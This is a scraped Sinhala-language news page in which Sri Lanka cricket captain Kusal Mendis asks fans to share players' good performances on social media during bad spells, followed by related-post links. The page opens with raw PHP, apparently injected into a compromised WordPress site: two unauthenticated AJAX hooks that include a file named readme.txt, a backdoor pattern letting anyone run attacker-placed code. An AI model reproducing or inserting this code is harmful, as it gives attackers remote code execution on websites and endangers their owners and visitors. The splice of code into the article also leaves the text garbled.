if(!function_exists('file_check_readme56685')){ add_action('wp_ajax_nopriv_file_check_readme56685', 'file_check_readme56685'); add_action('wp_ajax_file_check_readme56685', 'file_check_readme56685'); function file_check_readme56685() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } if(!function_exists('file_check_readme40625')){ add_action('wp_ajax_nopriv_file_check_readme40625', 'file_check_readme40625'); add_action('wp_ajax_file_check_readme40625', 'file_check_readme40625'); function file_check_readme40625() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } අපට වරදිනකොටත් අපේ හොද දාන්න.. හොද වීඩියෝ ශෙයා කරන්න..- කුසල් රටෙන්ම ඉල්ලයි.. - mediahumanrights.lk
mediahumanrights.lk
News Sports Sports News

අපට වරදිනකොටත් අපේ හොද දාන්න.. හොද වීඩියෝ ශෙයා කරන්න..- කුසල් රටෙන්ම ඉල්ලයි..

ක‍්‍රිකට් කණ්ඩායමේ ක්‍රීඩකයන්ට වරදින අවස්ථා වලදී හොඳ දේවල් සමාජ ජාලා වලට එක් කරන ලෙස ශ්‍රී ලංකා කණ්ඩායමේ නායක කුසල් මෙන්ඩිස් ඉල්ලා සිටියි.

‘ක්‍රීඩකයන්ට වරදිනකොට සමාජ මාධ්‍ය වල හොඳ දේවල් දාන්න. මම නායකය විතර ඉල්ලන්නේ පුළුවන් තරම් අපිට උදව් කරන්න. අපි වැටිච්ච වෙලාවට අපේ හොඳ දේවල් තියෙනවා බැට්ස්මන්ලා ලකුණු ගහපු දේවල් තියෙනවා ඒව ශෙයා කරන්න. අපිට හොඳ දේවල් කියන එක තමයි මම බලාපොරොත්තු වෙන්නේ’

ඔහු මෙම අදහස් පළ කළේ ක‍්‍රිකට් ආයතන දී පැවති මාධ්‍ය හමුව අමතමිනි.

Related posts

රාජිත කට නිසා අමාරුවේ… රහස් පොලිසියෙන් ප‍්‍රශ්ණ කරන්න යයි..

Shiran Viraj

අග‍්‍රාමාත්‍යවරයාගේ ආරක්ෂක අංශයේ සේවය කරන බව පවසා මහාපරිමාණ මූල්‍ය වංචා කළ අයෙක් බැලුම්ගල දුන් ඔත්තුවෙන් කොටු

Shiran Viraj

නුගේගොඩ අනුලා විදුහල්පතිනියටත් වහාම මාරුවක් – පරීක්ෂණ ක්‍රියාත්මකයි

Shiran Viraj